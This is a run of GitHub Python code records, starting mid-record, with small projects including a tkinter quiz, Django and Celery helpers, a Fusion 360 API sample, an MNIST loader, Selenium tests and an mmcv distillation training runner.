https://github.com/ksu-is/Can-You-Survive-Jumanji-Quiz/blob/main/Nigel.png -o Nigel.png \"\n#os.system(cmd)\n\n#Nigel_img = open('Nigel.png', 'r+')\n\nroot = Tk()\nroot.title(\"Can You Survive?: Jumanji Quiz\")\n#root.iconbitmap('jewel.jpg')\nroot.geometry(\"300x300\")\n\nresults =3\n\ndef results_clicker():\n #global pop\n #pop = Toplevel(root)\n #pop.title(\"Game Results\")\n #pop.geometry(\"250x150\")\n #pop.config(bg= \"green\")\n\n if results >= 5:\n global pop\n pop = Toplevel(root)\n pop.title(\"Game Results\")\n pop.geometry(\"250x150\")\n pop.config(bg= \"green\")\n global nigel\n nigel = PhotoImage(file= 'Nigel.png') #\"https://github.com/ksu-is/Can-You-Survive-Jumanji-Quiz/blob/main/Nigel.png\")\n nigel_label = Label(image= nigel)\n nigel_label.pack()\n pop_label = Label (pop, text=\"Congratulations!\\nYou survived Jumanji.\", bg= \"green\", fg= \"white\", font= (\"arial\", 12))\n pop_label.pack(pady=10)\n\n my_frame = Frame(pop, bg= \"green\")\n my_frame.pack(pady=5)\n\n nigel_pic = Label(my_frame, image= nigel, borderwidth=0)\n nigel_pic.grid(row=0, column=0, padx=10)\n \n\n okay= Button(my_frame, text= \"Okay\", command = my_frame.quit)\n okay.grid(row= 0, column=1, padx=10)\n elif results < 5:\n global popup\n popup = Toplevel(root)\n popup.title(\"Game Results\")\n popup.geometry(\"250x150\")\n popup.config(bg= \"black\")\n global russell\n russell= ImageTk.PhotoImage(file= 'Russell.jpg')\n #russell = PhotoImage(file='Russell.png')\n russell_label = Label(image= russell)\n russell_label.pack()\n pop_2_label = Label (popup, text=\"Oh no! 
You didn't survive.\\nBetter luck next time.\", bg= \"black\", fg= \"white\", font= (\"arial\", 12))\n pop_2_label.pack(pady=10)\n\n my_2_frame = Frame(popup, bg= \"black\")\n my_2_frame.pack(pady=5)\n\n russell_pic = Label(my_2_frame, image= russell, borderwidth=0)\n russell_pic.grid(row=0, column=0, padx=10)\n\n okay_2= Button(my_2_frame, text= \"Okay\", command = my_2_frame.quit)\n okay_2.grid(row= 0, column=1, padx=10)\n\n\n\n\n\n\n\nresults_button= Button(root, text= \"Results\", command= results_clicker)\nresults_button.pack(pady=50)\n\nmy_label = Label(root, text= \"\")\nmy_label.pack(pady=20)\n\n\n\n\nroot.mainloop()\n\nprint(\"Thanks for playing!\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#print(\"Welcome to the Jumanji Quiz!\", \"\\nThis quiz will test whether you could survive Jumanji.\")\n#root = Tk()\n#root.title(\"Can You Survive?: Jumanji Quiz\")\n#main_img= ImageTk.PhotoImage(Image.open(\"maincharacters.jpg\"))\n#my_label= Label(image= main_img)\n#my_label.pack()\n#button_quit= Button(root, text= \"Press Exit and return to quiz in terminal\", command= root.quit)\n#button_quit.pack()\n\n#character_choice = input(\"Which character do you want to play as (Choose a letter)?:\\nA)Dr.Smoulder Bravestone\\nB)Ruby Roundhouse\\nC)Professor Shelly Oberon\\nD)Franklin Finbar 'Mouse'\\n\").upper()\n\n#correct = 3\n#def results_click():\n #if correct >= 5:\n #print(correct, \"/10\")\n # win= messagebox.showinfo(\"Results\",\"Congratulations! You survived Jumanji.\")\n \n # if correct <5:\n #print(correct, \"/10\")\n #lose= messagebox.showinfo(\"Results\",\"Oh no! You didn't survive.\\nBetter luck next time.\")\n \n#results_button= Button(root, text= \"Results\", command= results_click).pack()\n#results_button.geometry(\"350x350\")\n#mainloop()\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#e= Entry(root, width= 100, borderwidth= 5)\n#e.pack()\n#question_1= \"There's a hippo coming up out of the water. 
What should you do?:\\nA)Scream for help\\nB)Run and hide\\nC)Stay as still as possible\\nD)Fight it\\n\"\n#e.insert(0,question_1)\n\n\n#def next_click():\n #question= Label(root, text = e.get())\n #question.pack()\n \n#myLabel1= Label(root, text = \"hello world\").grid(row= 0, column= 0)\n#myLabel2 = Label(root, text= \"my name is janai\").grid(row=1, column= 0)\n#next_button= Button(root, text= \"Next\", padx= 5, pady= 5, command= next_click)\n#next_button.pack()\n\n#myLabel1.grid(row= 0, column= 0)\n#myLabel2.grid(row=1, column= 0)\n\n#root.mainloop()","repo_name":"ksu-is/Can-You-Survive-Jumanji-Quiz","sub_path":"tkinter testing.py","file_name":"tkinter testing.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"32521259054","text":"from django.shortcuts import get_object_or_404\nfrom ecommerce.models import Product\n\ndef cart_contents(request):\n \"\"\"\n Allows contents of cart to be displayed on any page of app\n \"\"\"\n \n cart = request.session.get('cart', {})\n \n cart_items = []\n total = 0\n product_count = 0\n for id, quantity in cart.items(): \n product = get_object_or_404(Product, pk=id)\n total += quantity * product.tribute\n product_count += quantity\n cart_items.append({'id': id, 'quantity': quantity, 'product': product})\n \n return {'cart_items': cart_items, 'total': total, 'product_count': product_count }","repo_name":"sarahcrosby/project-five-django","sub_path":"cart/contexts.py","file_name":"contexts.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"8350409236","text":"#Author-Autodesk Inc.\n#Description-Demonstrates creating save a new file and then inserting it into a design\n\n\nimport adsk.core, adsk.fusion, adsk.cam, traceback\n\n# Global variable used to maintain a reference to all event handlers.\nhandlers = []\n\n_app = adsk.core.Application.get()\n_ui = _app.userInterface\n\nnewFilename = 'SampleSave'\n_docId = ''\n\ndef run(context):\n try:\n # Check that the active document has been saved.\n doc = _app.activeDocument\n if not doc.isSaved:\n _ui.messageBox('The active document must be saved before running this script.')\n return\n\n parentFolder = doc.dataFile.parentFolder\n\n # Connect to the dataFileComplete event, to watch for when the file has been fully saved on Fusion Team.\n onDataFileComplete = MyDataFileCompleteHandler()\n _app.dataFileComplete.add(onDataFileComplete)\n handlers.append(onDataFileComplete)\n\n # Create a new design with a cylinder.\n newDoc = CreateCylinderDesign(parentFolder, newFilename)\n\n adsk.autoTerminate(False)\n except:\n _ui.messageBox('Failed:\\n{}'.format(traceback.format_exc()))\n\n\n# Event handler for the dataFileComplete event.\nclass MyDataFileCompleteHandler(adsk.core.DataEventHandler):\n def __init__(self):\n super().__init__()\n def notify(self, args: adsk.core.DataEventArgs):\n try:\n # Check to see if the document we care about is the one that saved.\n if args.file.name == newFilename:\n cylinderDoc = args.file\n \n topDoc = _app.activeDocument\n\n # Insert the saved document into the activate document.\n des: adsk.fusion.Design = topDoc.products.itemByProductType('DesignProductType')\n root = des.rootComponent\n\n cylOcc = root.occurrences.addByInsert(args.file, adsk.core.Matrix3D.create(), True)\n\n adsk.terminate()\n except:\n _ui.messageBox('Failed:\\n{}'.format(traceback.format_exc()))\n \n\ndef 
CreateCylinderDesign(folder, filename):\n try:\n # Create a new document and have it be invisible.\n cylinderDoc: adsk.fusion.FusionDocument = _app.documents.add(adsk.core.DocumentTypes.FusionDesignDocumentType, True)\n\n # Get the Design and root component from the document.\n des: adsk.fusion.Design = cylinderDoc.products.itemByProductType('DesignProductType')\n root = des.rootComponent\n\n # Create a sketch with a single circle.\n sk: adsk.fusion.Sketch = root.sketches.add(root.yZConstructionPlane)\n sk.sketchCurves.sketchCircles.addByCenterRadius(adsk.core.Point3D.create(3,2,0), 4)\n prof = sk.profiles[0]\n\n # Create an extrusion, using the circle.\n root.features.extrudeFeatures.addSimple(prof, adsk.core.ValueInput.createByReal(12), adsk.fusion.FeatureOperations.NewBodyFeatureOperation)\n\n # Save the document.\n cylinderDoc.saveAs(filename, folder, 'Sample demonstrating watching for the save to complete.', '')\n\n global _docId\n _docId = cylinderDoc.creationId\n cylinderDoc.close(False)\n except:\n _ui.messageBox('Failed:\\n{}'.format(traceback.format_exc()))","repo_name":"JeromeBriot/fusion360-offline-api-samples","sub_path":"Python/General/Miscellaneous/SaveAndInsertFileApiSample/SaveAndInsertFileApiSample.py","file_name":"SaveAndInsertFileApiSample.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"5848585578","text":"import pyodbc\nDBfile='D:/QtTest/NounDicWithDb/NounLib.mdb'\nconn = pyodbc.connect('DRIVER={Microsoft Access Driver (*.mdb)};DBQ='+DBfile)\ncursor=conn.cursor()\nfrom lxml import etree\ncursor.execute('select * from Result')\nLs=cursor.fetchall()\nLs.sort(key=lambda x:x[1])\nroot=etree.Element('WordList')\nj=0;\nroot.append(etree.Element('WordGroup'))\nfor\ti\tin range(len(Ls)):\n\t\t\t\tk=etree.Element('word')\n\t\t\t\tif(Ls[i][4]):\n\t\t\t\t\tk.set('Property',Ls[i][4]);\n\t\t\t\tk.set('Level',str(Ls[i][5]));\n\t\t\t\tk.append(etree.Element('description'))\n\t\t\t\tk.append(etree.Element('wordform'))\n\t\t\t\tk[1].append(etree.Element('or'))\n\t\t\t\tk[1][0].text=Ls[i][0]\n\t\t\t\tk[1].append(etree.Element('reflectiveChange'))\n\t\t\t\tif(Ls[i][6]):\n\t\t\t\t\tk[1][1].text=Ls[i][6]\n\t\t\t\telse:\n\t\t\t\t\tk[1][1].text=''\n\t\t\t\tk.append(etree.Element('TE'))\n\t\t\t\tk[2].text=Ls[i][3]\n\t\t\t\troot[j].append(k)\n\t\t\t\tif(i==len(Ls)-1):\n\t\t\t\t\tcontinue;\n\t\t\t\tif(abs(Ls[i][1]-Ls[i+1][1])<0.5):\n\t\t\t\t\tcontinue;\n\t\t\t\texample=etree.Element('example')\n\t\t\t\texample.text=Ls[i][2]\n\t\t\t\troot[j].append(example)\n\t\t\t\tj+=1\n\t\t\t\troot.append(etree.Element('WordGroup'))\n##a=['Tor','Torte','Tourist',u'T\\xfcr','Vermieterin']\n##for i in range(0,5):\n## cursor.execute(u\"select * from Noun where wordform='{0}'\".format(a[i]))\n## result=cursor.fetchall()\n## f=open('D:/ProjectNote/GermaData/DicTest/Format.xml','rb')\n## st=f.read()\n## st=st.replace('',a[i].encode('utf-8')+'')\n## st=st.replace('',str(result[0][-3])+'')\n## st=st.replace('',result[0][-2].encode('utf-8')+'')\n## st=st.replace('',result[0][2].encode('utf-8')+'')\n## st=st.replace('',result[0][3].encode('utf-8')+'')\n## st=st.replace('',result[0][5].encode('utf-8')+'')\n## st=st.replace('',result[0][6].encode('utf-8')+'')\n## f=open('D:/ProjectNote/GermaData/DicTest/Wort/%d.xml'%(i+261),'wb')\n## f.write(st)\n## f.close()\n#print 
etree.tostring(root,encoding='utf-8',pretty_print=True)\nf=open('D:/ProjectNote/GermaData/KlickAufDeutschEins/VokabelnText.xml','wb')\nf.write(''+etree.tostring(root,encoding='utf-8',pretty_print=True))\nf.close()\n##for i in root:\n##\tif(len(i)>1):\n##\t\tprint i[0][1]\n","repo_name":"zhaofeng-shu33/tech-chores-archive","sub_path":"2016/ProjectNote/PyTest/DataBaseProcessing.py","file_name":"DataBaseProcessing.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"16849991556","text":"#!/usr/bin/env python3\nfrom student.all import get_all_info, return_json_all\nfrom student.get_info import get_student_info, return_json_info\nfrom student.grade import get_grade, return_json_grade\nfrom student.schedule import get_schedule, return_json_schedule\n\n\n# These are the route dispatch functions\ndef route(do, student, login_session, now_url, login_soup, send_header, jud, err_info):\n    # When the requested operation is fetching the current user's info\n    if do == \"info\":\n        if jud:\n            return get_student_info(student, login_session, now_url, login_soup, send_header)\n        else:\n            return return_json_info(jud, err_info, \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\")\n    elif do == \"all\":\n        if jud:\n            return get_all_info(student, login_session, now_url, login_soup, send_header)\n        else:\n            return return_json_all(jud, err_info, None, None, None)\n    else:\n        if do == \"schedule\":\n            if jud:\n                return get_schedule(login_session, now_url, login_soup, send_header)\n            else:\n                return return_json_schedule(False, \"\", [])\n        elif do == \"grade\":\n            if jud:\n                return get_grade(login_session, now_url, login_soup, send_header)\n            else:\n                return return_json_grade(False, \"\", [])\n","repo_name":"czarhao/sync_crawler","sub_path":"route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"}
{"seq_id":"23831542153","text":"import gzip\nimport logging\nimport os\nimport struct\n\nimport numpy as np\n\nIMAGE_WIDTH = 28\nIMAGE_HEIGHT = 28\n\nIDX_DATA_TYPE_U8 = 0x8\nIDX_DATA_TYPE_S8 = 0x9\nIDX_DATA_TYPE_I16 = 0xb\nIDX_DATA_TYPE_I32 = 0xc\nIDX_DATA_TYPE_F32 = 0xd\nIDX_DATA_TYPE_F64 = 0xe\n\ndef load(name, folder=None):\n    if not folder:\n        folder = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"mnist_data\")\n\n    images = load_images(os.path.join(folder, name + \"-images-idx3-ubyte.gz\"))\n    labels = load_labels(os.path.join(folder, name + \"-labels-idx1-ubyte.gz\"))\n    return zip(images, labels)\n\ndef load_images(file_name):\n    fh = gzip.open(file_name, \"rb\")\n    (data_type, dimensions) = read_idx_file(file_name, fh)\n    assert data_type == IDX_DATA_TYPE_U8, \"invalid data type(%x) from file '%s'\" % (data_type,\n                                                                                    file_name)\n    assert len(dimensions) == 3, \"invalid # of dimensions(%d != 3) from file '%s'\" % (\n        len(dimensions), file_name)\n    assert dimensions[1] == 28 and dimensions[2] == 28, \\\n        \"invalid image size(%dx%d != 28x28) from file '%s'\" % (dimensions[1], dimensions[2],\n                                                               file_name)\n    num_images = dimensions[0]\n    images = [None] * num_images\n    for i in xrange(num_images):\n        data = map(lambda x: x/256.0, bytearray(fh.read(28*28)))\n        images[i] = np.array(data, dtype=np.float32, ndmin=2).transpose()\n    fh.close()\n    return images\n\ndef load_labels(file_name):\n    fh = gzip.open(file_name, \"rb\")\n    (data_type, dimensions) = read_idx_file(file_name, fh)\n    assert data_type == IDX_DATA_TYPE_U8, \"invalid data type(%x) from file '%s'\" % (data_type,\n                                                                                    file_name)\n    
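# label files are one-dimensional in the IDX format: a single vector with one unsigned byte per label\n    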
assert len(dimensions) == 1, \"invalid # of dimensions(%d != 1) from file '%s'\" % (\n len(dimensions), file_name)\n num_labels = dimensions[0]\n labels = [-1] * num_labels\n for i in xrange(num_labels):\n labels[i] = struct.unpack('B', fh.read(1))[0]\n fh.close()\n return labels\n\ndef read_idx_file(file_name, fh):\n magic = struct.unpack(\">i\", fh.read(4))[0]\n assert (magic & 0xffff0000) == 0, \"invalid magic number(%x) from file '%s'\" % (magic, file_name)\n data_type = (magic >> 8)\n n = (magic & 0xff)\n dimensions = [0] * n\n for i in xrange(n):\n dimensions[i] = struct.unpack(\">i\", fh.read(4))[0]\n return (data_type, dimensions)\n","repo_name":"YijinLiu/deep-learning","sub_path":"py/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36940140887","text":"import logging\nfrom datetime import datetime\n\nfrom django.conf import settings\nfrom celery.signals import beat_init, celeryd_init, task_internal_error, import_modules\n\nfrom .utils import autodiscover_tasks\n\nlogger = logging.getLogger(\"celery.worker\")\n\n\n@celeryd_init.connect\ndef load_worker(sender, instance, conf, options, **kwargs):\n logging.warning(\"Sender<%s> instance: %s, conf: %s, options: %s\", sender, instance, conf, options)\n\n if not conf.result_backend:\n logger.warning(\"Setting `result_backend` is strongly recommended.\")\n\n from django_celery_beat.models import PeriodicTask\n from django_celery_jobs.jobScheduler.trigger.cron import CronTrigger\n from django_celery_jobs.tasks.task_synchronous_jobs import sync_celery_native_tasks\n\n sync_celery_native_tasks()\n\n # Pause: Auto sync celery task to database\n if getattr(settings, ' DJANGO_CELERY_NATIVE_TASK_SYNC', False):\n trigger = CronTrigger.from_crontab('*/5 * * * *') # Every 5 minute\n crontab_id = trigger.get_trigger_schedule()['crontab_id']\n\n name = sync_celery_native_tasks.name\n beat_task = PeriodicTask.objects.filter(task=name, enabled=True).first()\n\n if not beat_task:\n PeriodicTask.objects.create(name=name, task=name, crontab_id=crontab_id)\n\n\n@beat_init.connect\ndef load_beat(sender, **kwargs):\n logging.warning('BeatScheduler must be injected first, now: %s', datetime.now())\n logging.warning('BeatScheduler => sender: %s, kwargs: %s', sender, kwargs)\n\n from django_celery_beat.models import PeriodicTask\n from django_celery_jobs.jobScheduler.trigger.cron import CronTrigger\n from django_celery_jobs.tasks.task_synchronous_jobs import watch_periodic_tasks\n\n trigger = CronTrigger.from_crontab('* * * * *')\n PeriodicTask.objects.get_or_create(\n name=watch_periodic_tasks.name, task=watch_periodic_tasks.name,\n crontab_id=trigger.get_trigger_schedule()['crontab_id'], enabled=True,\n )\n\n\n@import_modules.connect\ndef discover_tasks(sender, **kwargs):\n logging.warning('discover_tasks => sender: %s, kwargs: %s, now: %s', sender, kwargs, datetime.now())\n\n autodiscover_tasks()\n\n\n@task_internal_error.connect\ndef handle_task_internal_error(sender, task_id, args, kwargs, request, einfo, **kw):\n \"\"\" Handle errors in tasks by signal, that is not internal logic error in task func code.\n Because the result of a failed task execution is stored in result_backend\n \"\"\"\n logging.warning(\"Handle task err => sender<%s> was error: %s at task<%s>\", sender, einfo, task_id)\n logger.error(\"TaskId: %s, args: %s, kwargs: %s, request: %s\", task_id, args, kwargs, 
request)\n","repo_name":"luojidr/django-celery-jobs","sub_path":"django_celery_jobs/jobScheduler/core/celery/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"74784613568","text":"import requests \nfrom bs4 import BeautifulSoup as bs\nimport re\nimport os \n\n\n\ndef get_images(url):\n\ttry:\n\t\tr = requests.get(url)\n\texcept requests.exceptions.RequestException as e:\n\t\tprint('Invalid URL')\n\t\treturn False\n\n\twebpage = bs(r.content, features=\"html.parser\")\t \n\timage_urls = [x['href'] for x in webpage.select(\"div[id='30darchive'] a[class=wcg-archive]\")]\n\n\tfor i in image_urls:\n\t\timg_data = requests.get(i).content\n\t\tpattern = \"oneyear/(.*?).jpg\"\n\t\tname = re.search(pattern, i).group(1)[6:] + '-' + re.search(pattern, i).group(1)[:5] \n\t\twith open(path + name + '.jpg', 'wb') as handler:\n\t\t\thandler.write(img_data)\n\treturn True\n\n\n\ndef get_urls(url):\n\ttry:\n\t\tr = requests.get(url)\n\texcept requests.exceptions.RequestException as e:\n\t\tprint('Invalid URL')\n\t\treturn False\n\n\twebpage = bs(r.content, features=\"html.parser\")\t \n\thyperlinks = [x['href'] for x in webpage.select(\"div[class='wcg-border wcg-box-mobile'] a\") if not 'complete' in x['href']]\n\n\tfor h in hyperlinks:\n\t\tget_images(h)\n\n\treturn True\n\n\n\npath = os.getcwd() + '..\\\\..\\\\..\\\\images\\\\'\n\ntry:\n os.mkdir(path)\nexcept OSError:\n pass\n\n\nurl = ''\nwhile True:\n\turl = input(\"URL: \")\n\tif url == 'exit':\n\t\tbreak\n\telse:\n\t\tget_urls(url)","repo_name":"JakubDmochowski/ZZSN_joint_repos","sub_path":"image_downloaders/python/get_images.py","file_name":"get_images.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"70049922690","text":"class Solution(object):\n def intersection(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: List[int]\n \"\"\"\n dict1 = {num : 0 for num in nums1}\n dict2 = {num : 0 for num in nums2}\n return [key for key in dict1.keys() if dict2.setdefault(key, 1) == 0]\n","repo_name":"ccbrantley/LeetCode","sub_path":"349-IntersectionOfTwoArrays/IntersectionofTwoArrays.py","file_name":"IntersectionofTwoArrays.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37407081843","text":"# Without logging in to the amazon account search a product and click to the first result\nimport time\nimport unittest\nfrom selenium import webdriver\nfrom sources.navigationBar import NavigationBar\nfrom sources.searchResultPage import SearchResult\n\n\n\nclass TestCase(unittest.TestCase):\n def setUp(self) -> None:\n self.driver = webdriver.Chrome()\n self.driver.delete_all_cookies()\n self.driver.maximize_window()\n self.driver.get(\"https://www.amazon.com/\")\n\n def test_search(self):\n self.navigationBar = NavigationBar(self.driver)\n self.navigationBar.fill_search_field(\"python books\")\n self.navigationBar.press_to_search_button()\n\n\n self.searchResult = SearchResult(self.driver)\n self.searchResult.press_to_first_product()\n\n def tearDown(self) -> None:\n 
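# close the window opened in setUp (quit() would also end the underlying session)\n        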
self.driver.close()\n","repo_name":"Tsoghik31/Tsoghik_POM_Homework","sub_path":"tests/SearchResultTest.py","file_name":"SearchResultTest.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"}
{"seq_id":"693084905","text":"# My own task decorator\n\ndef print_task(task_no):\n    def decorator_task(func_task):\n        def wrapper_task(*args):\n            print(f'{\"̅\" * 20} {task_no} TASK {\"̅\" * 20}')\n            func_task(*args)\n            print(f'{\"̅\" * 50}')\n\n        return wrapper_task\n\n    return decorator_task\n\n\n# Lexicographic ascending order*\n# The input is some number of space-separated integers (no more than a hundred),\n# each no less than 0 and no greater than 19.\n# Print them, separated by spaces, in the lexicographically ascending order of the English names of these numbers.\n# I.e., say, the numbers 1, 2, 3 must be printed in the order 1, 3, 2,\n# since the word two appears later in the dictionary than the word three, and the word three -- later than one\n# (in other words, because the expression 'one' < 'three' < 'two' is true)\n#\n\n\n@print_task('THIRD')\ndef func():\n    number_names = \\\n        {\n            0: 'zero', 1: 'one', 2: 'two', 3: 'three', 4: 'four', 5: 'five', 6: 'six', 7: 'seven', 8: 'eight',\n            9: 'nine',\n            10: 'ten', 11: 'eleven', 12: 'twelve',\n            13: 'thirteen', 14: 'fourteen', 15: 'fifteen', 16: 'sixteen', 17: 'seventeen', 18: 'eighteen',\n            19: 'nineteen'\n        }\n    input_num = list(map(str, input('Enter numbers by space: ').split()))\n\n    sorted_dict = {}\n    sorted_keys = sorted(number_names, key=number_names.get)\n\n    for v in sorted_keys:\n        sorted_dict[v] = number_names[v]\n\n    new_one = {}\n    for k, v in sorted_dict.items():\n        if str(k) in input_num:\n            new_one[k] = v\n    print(\"Sorted result:\")\n    for key in new_one.keys():\n        print(key, end=' ')\n    print()\n\n\nfunc()\n","repo_name":"AlekseyQty/qap09-onl","sub_path":"vajda_maksim_valerevich/hm_8/homework_8_3.py","file_name":"homework_8_3.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"ru","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"}
{"seq_id":"7008454431","text":"from typing import List\n\nfrom cirro.api.models.project import Project\nfrom cirro.cli.interactive.utils import ask\n\n\ndef ask_project(projects: List[Project], input_value: str) -> str:\n    project_names = sorted([project.name for project in projects])\n    if len(project_names) <= 10:\n        return ask(\n            'select',\n            'What project is this dataset associated with?',\n            choices=project_names,\n            default=input_value if input_value in project_names else None\n        )\n    else:\n        return ask(\n            'autocomplete',\n            'What project is this dataset associated with? 
(use TAB to display options)',\n choices=project_names,\n default=input_value if input_value in project_names else ''\n )\n","repo_name":"CirroBio/Cirro-client","sub_path":"cirro/cli/interactive/common_args.py","file_name":"common_args.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"29501540373","text":"from autoinvoice import configs\nfrom autoinvoice.common import pure_virtual\n\n\nclass ICompanyRegister:\n def __init__(self):\n self.verbose = configs.config.getboolean('Options', 'verbose', fallback=False)\n\n @pure_virtual\n def getRecords(self, TaxPayerId, url, key) -> []:\n \"\"\"\n Return vector with dictionaries related to single tax payer id\n \"\"\"\n return [self.buildRecord(...)]\n\n def buildRecord(self, taxpayerid, regon, customername, state, address, postcode, city, refere) -> dict:\n if not isinstance(taxpayerid, str):\n raise ValueError('taxpayerid is not str, {}'.format(type(taxpayerid)))\n if not isinstance(regon, str):\n raise ValueError('regon is not str, {}'.format(type(regon)))\n if not isinstance(customername, str):\n raise ValueError('name is not str, {}'.format(type(customername)))\n if not isinstance(state, str):\n raise ValueError('state is not str, {}'.format(type(state)))\n if not isinstance(address, str):\n raise ValueError('address is not str, {}'.format(type(address)))\n if not isinstance(postcode, str):\n raise ValueError('postcode is not str, {}'.format(type(postcode)))\n if not isinstance(city, str):\n raise ValueError('city is not str, {}'.format(type(city)))\n if not isinstance(refere, str):\n raise ValueError('refere is not str, {}'.format(type(refere)))\n return {\n 'taxpayerid' : taxpayerid,\n 'regon' : regon,\n 'customername' : customername,\n 'state' : state,\n 'address' : address,\n 'postcode' : postcode,\n 'city' : city,\n 'refere' : refere\n }\n\n def recordToRefere(self, record) -> dict:\n \"\"\"\n Takes as input database record\n \"\"\"\n if self.verbose:\n print(record)\n\n return {\n 'ref_taxpayerid' : record['taxpayerid'],\n 'ref_regon' : record['regon'],\n 'ref_companyname' : record['customername'],\n 'ref_state' : record['state'],\n 'ref_address' : record['address'],\n 'ref_postcode' : record['postcode'],\n 'ref_city' : record['city'],\n 'ref_refere' : record['refere'],\n }\n\n\n@pure_virtual\ndef get():\n return ICompanyRegister","repo_name":"str0g/autoinvoice","sub_path":"autoinvoice/mod_company_register/plugins/iface.py","file_name":"iface.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"17675560663","text":"import os.path as osp\nimport platform\nimport shutil\nimport time\nimport warnings\n\nimport torch\nfrom torchvision.utils import save_image \n\nimport mmcv\nfrom .base_runner_feat_cls_loc import BaseRunnerFeatClsLoc\nfrom mmcv.runner.builder import RUNNERS\nfrom mmcv.runner.checkpoint import save_checkpoint\nfrom mmcv.runner.utils import get_host_info\nimport torch.nn.functional as F\n\n\ndef get_info_t(data_batch, teacher, cfg):\n \"\"\"\n get the logits from the classification teacher for KD_cls \n \"\"\"\n teacher.eval()\n boxes_list = data_batch['gt_bboxes'].data[0]\n images = data_batch['img'].data[0]\n height, width = images.size(2), images.size(3)\n nobj = [0]\n img_cls = []\n\n for (ni, img) in enumerate(images):\n input_img= img.unsqueeze(0).cuda()\n box_list = boxes_list[ni].cuda() \n 
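# nobj keeps cumulative box counts per image, so the teacher logits computed for the whole batch can be sliced back out per image further down\n        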
nobj.append(nobj[ni]+box_list.size(0)) \n if box_list.size(0) < 1:\n continue\n left = torch.clamp(box_list[ :, 0], min=0)\n bottom = torch.clamp(box_list[:, 1], min=0)\n right = torch.clamp(box_list[:, 2], max=width)\n top = torch.clamp(box_list[:, 3], max=height)\n\n theta = torch.zeros((box_list.size(0), 2, 3), dtype=torch.float).cuda()\n theta[:, 0, 0] = (right-left)/width\n theta[:, 1, 1] = (top-bottom)/height\n \n theta[:, 0, 2] = -1. + (left + (right-left)/2)/(width/2)\n theta[:, 1, 2] = -1. + ((bottom + (top-bottom)/2))/(height/2)\n \n grid_size = torch.Size((box_list.size(0), input_img.size(1), cfg.object_size, cfg.object_size))\n grid = F.affine_grid(theta, grid_size, align_corners=False) \n img_ = F.grid_sample(torch.cat(box_list.size(0)*[input_img]), grid, align_corners=False) \n img_cls.append(img_)\n\n imgs_cls = torch.cat(img_cls, dim=0)\n with torch.no_grad():\n logit_t_ = teacher(imgs_cls).cpu()\n \n for i in range(images.size(0)): \n if nobj[i] == nobj[i+1]:\n logits_t = [] ## something for no objects\n else:\n logits_t = [logit_t_[nobj[i]:nobj[i+1]]]\n data_batch['img_metas'].data[0][i].update({'gt_logits_t': logits_t})\n\n return data_batch \n\n@RUNNERS.register_module()\nclass EpochBasedRunnerFeatClsLoc(BaseRunnerFeatClsLoc):\n \"\"\"Epoch-based Runner.\n\n This runner train models epoch by epoch.\n \"\"\"\n def run_iter(self, data_batch, train_mode, **kwargs):\n if self.batch_processor is not None:\n outputs = self.batch_processor(\n self.model, data_batch, train_mode=train_mode, **kwargs)\n elif train_mode:\n outputs = self.model.train_step(data_batch, self.optimizer,\n **kwargs)\n else:\n outputs = self.model.val_step(data_batch, self.optimizer, **kwargs)\n if not isinstance(outputs, dict):\n raise TypeError('\"batch_processor()\" or \"model.train_step()\"'\n 'and \"model.val_step()\" must return a dict')\n if 'log_vars' in outputs:\n self.log_buffer.update(outputs['log_vars'], outputs['num_samples'])\n self.outputs = outputs\n\n def train(self, data_loader, **kwargs):\n self.model.train()\n if self.teacher_det is not None:\n self.teacher_det.train()\n if self.teacher_cls is not None:\n self.teacher_cls.eval()\n self.mode = 'train'\n self.data_loader = data_loader\n self._max_iters = self._max_epochs * len(self.data_loader)\n\n self.call_hook('before_train_epoch')\n time.sleep(2) # Prevent possible deadlock during epoch transition\n for i, data_batch in enumerate(self.data_loader):\n self._inner_iter = i\n self.call_hook('before_train_iter')\n # update data_batch \n if self.batch_processor is None:\n if self.teacher_det is not None:\n with torch.no_grad():\n t_info = self.teacher_det.train_step(data_batch, self.optimizer, epoch=self.epoch,\n iter=self._inner_iter, teach=True, t_info=None,\n **kwargs)\n else:\n t_info = None\n if self.teacher_cls is not None:\n data_batch = get_info_t(data_batch, self.teacher_cls, self.model.module.kt_cfg.cfg_t)\n\n outputs = self.model.train_step(data_batch, self.optimizer, epoch=self.epoch,\n iter=self._inner_iter, teach=False, t_info=t_info,\n **kwargs)\n else:\n outputs = self.batch_processor(\n self.model, 